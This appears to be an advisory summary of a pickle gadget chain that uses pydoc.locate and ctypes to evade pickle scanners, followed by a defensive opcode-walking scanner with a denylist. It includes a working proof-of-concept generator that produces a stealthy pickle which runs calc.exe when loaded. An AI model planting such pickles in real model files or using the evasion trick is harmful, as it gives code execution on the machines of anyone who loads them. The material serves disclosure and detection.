From the screenshot, the following key information about the vulnerability can be extracted:

### Summary

- **Vulnerability Name**: `ctypes and pydoc gadget chain to bypass detection`
- **Publisher**: thomas-chauchefoin-tob
- **Release Time**: Last week
- **CVE ID**: Unknown
- **Severity**: High

### Affected and Fixed Versions

- **Affected Versions**: `= v0.1.7`

### Vulnerability Details

- **Description**: This vulnerability chains the `ctypes` and `pydoc` modules to bypass detection; combined, they achieve remote code execution (RCE) when the pickle is loaded.
- **Cause**: The `ctypes` and `pydoc` modules are not explicitly blocked, and existing pickle scanning tools (such as picklescan) do not flag calls to `pydoc.locate`, which resolves an arbitrary dotted name to an object and therefore works as a dynamic importer.
- **Report ID and Resolution Link**: b793563

#### Exploitation Steps

1. Import `GLOBAL pydoc locate`.
2. Call `locate('ctypes.windll.kernel32.WinExec')`.
3. Execute the returned result with `b'calc.exe'`.

### Proof of Concept (PoC) Code Example

```python
import os

GLOBAL = b'c'
STRING = b'S'
BININT = b'K'
TUPLE1 = b'\x85'
...

def generate_stealth_payload():
    payload = b""
    payload += GLOBAL + b"pydoc\nlocate\n"
    payload += STRING + b"ctypes.windll.kernel32.WinExec\n"
    payload += TUPLE1 + REDUCE
    payload += PUT + b"0\n"  # Var 0 =
    payload += POP
    payload += GET + b"0\n"
    payload += b'C' + b"\x08" + b"calc.exe"
    payload += BININT + b"\x01"
    payload += TUPLE2 + REDUCE
    payload += PUT + b"1\n"  # Var 1 = Execution Result
    payload += POP
    payload += GLOBAL + b"builtins\nException\n"
    payload += EMPTY_TUPLE + REDUCE
    payload += PUT + b"2\n"  # Var 2 = Exception instance
    payload += EMPTY_DICT
    payload += STRING + b"'rce_status'\n"
    payload += GET + b"1\n"
    payload += SETITEM
    payload += BUILD
    payload += STOP
    return payload

data = generate_stealth_payload()
with open("stealth_ctypes.pkl", "wb") as f:
    f.write(data)
print("Generated 'stealth_ctypes.pkl'")
```

### Fickling Perspective

```python
from pydoc import locate

_var0 = locate('ctypes.windll.kernel32.WinExec')
_var1 = _var0(b'calc.exe', 1)
_var2 = Exception()
_var3 = _var2
_var3.__setstate__({'rce_status': _var1})
result0 = _var3
```

Throughout the process, the malicious example attempts to execute `calc.exe` while bypassing detection. The demonstrator also mentioned storing the call's result in an exception object to circumvent unused-variable checks, further enhancing the stealthiness of the exploit.
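The advisory's point is that a scanner which only denies well-known modules by name misses `pydoc.locate`, because `locate` itself resolves whatever dotted path it is given. The check a defender wants is a static walk over the pickle's opcode stream that records every `GLOBAL` / `STACK_GLOBAL` reference without ever unpickling, and treats import-like gadgets (`pydoc.locate`, anything under `ctypes`) as dangerous. The following is an added example written for this page; it is not code from the advisory, from fickling or from picklescan. The denylist contents, the function names and the sample pickles are constructed for illustration; the samples merely reference `pydoc.locate` (no `REDUCE`, so nothing is called) so that the detector has something to flag.

```python
import pickle
import pickletools
from pydoc import locate

# Constructed denylist (an assumption for this example, not any scanner's real list):
# callables that resolve or execute arbitrary code. pydoc.locate belongs here
# because it behaves like a dynamic importer and so defeats scanners that only
# deny known-dangerous modules by name.
DANGEROUS_CALLABLES = {
    ("pydoc", "locate"),
    ("importlib", "import_module"),
    ("builtins", "__import__"),
    ("builtins", "eval"),
    ("builtins", "exec"),
    ("os", "system"),
}
# Any reference into these module trees is flagged regardless of the attribute.
DANGEROUS_MODULE_ROOTS = {"ctypes"}

# Opcodes that push a string which STACK_GLOBAL (protocol 4+) may consume.
STRING_OPCODES = {
    "STRING", "BINSTRING", "SHORT_BINSTRING",
    "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8",
}


def find_global_refs(data: bytes) -> list[tuple[str, str]]:
    """Return every (module, name) the pickle would import, without loading it.

    pickletools.genops only disassembles, so nothing in `data` runs. GLOBAL
    carries "module name" in its argument; STACK_GLOBAL takes module and name
    from the two strings pushed before it, which this approximates by
    remembering the last two string opcodes seen.
    """
    refs: list[tuple[str, str]] = []
    recent_strings: list[str] = []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name == "GLOBAL":
            module, _, name = arg.partition(" ")
            refs.append((module, name))
        elif opcode.name in STRING_OPCODES:
            recent_strings.append(arg)
        elif opcode.name == "STACK_GLOBAL" and len(recent_strings) >= 2:
            refs.append((recent_strings[-2], recent_strings[-1]))
    return refs


def scan_pickle(data: bytes) -> list[str]:
    """Return dotted names of dangerous imports found in the pickle (empty means clean)."""
    findings = []
    for module, name in find_global_refs(data):
        root = module.split(".", 1)[0]
        if (module, name) in DANGEROUS_CALLABLES or root in DANGEROUS_MODULE_ROOTS:
            findings.append(f"{module}.{name}")
    return findings


# Constructed samples: a benign pickle, and pickles that only *reference*
# pydoc.locate, once via the protocol 2 GLOBAL opcode and once via the
# protocol 4 STACK_GLOBAL opcode. Neither contains REDUCE, so neither calls it.
SAMPLE_BENIGN = pickle.dumps({"weights": [0.1, 0.2], "epoch": 3})
SAMPLE_LOCATE_PROTO2 = pickle.dumps(locate, protocol=2)
SAMPLE_LOCATE_PROTO4 = pickle.dumps(locate, protocol=4)

if __name__ == "__main__":
    for label, blob in [("benign", SAMPLE_BENIGN),
                        ("locate/proto2", SAMPLE_LOCATE_PROTO2),
                        ("locate/proto4", SAMPLE_LOCATE_PROTO4)]:
        print(f"{label}: {scan_pickle(blob) or 'clean'}")
```

The design choice worth noting is that the walk never calls `pickle.load`; the whole value of a scanner like this is that it decides before any `REDUCE` can run. A denylist is also only the first layer: a scanner for model files should really allowlist the handful of globals a framework legitimately needs and reject everything else, which is what makes a dynamic importer such as `pydoc.locate` irrelevant even when it is not on the list.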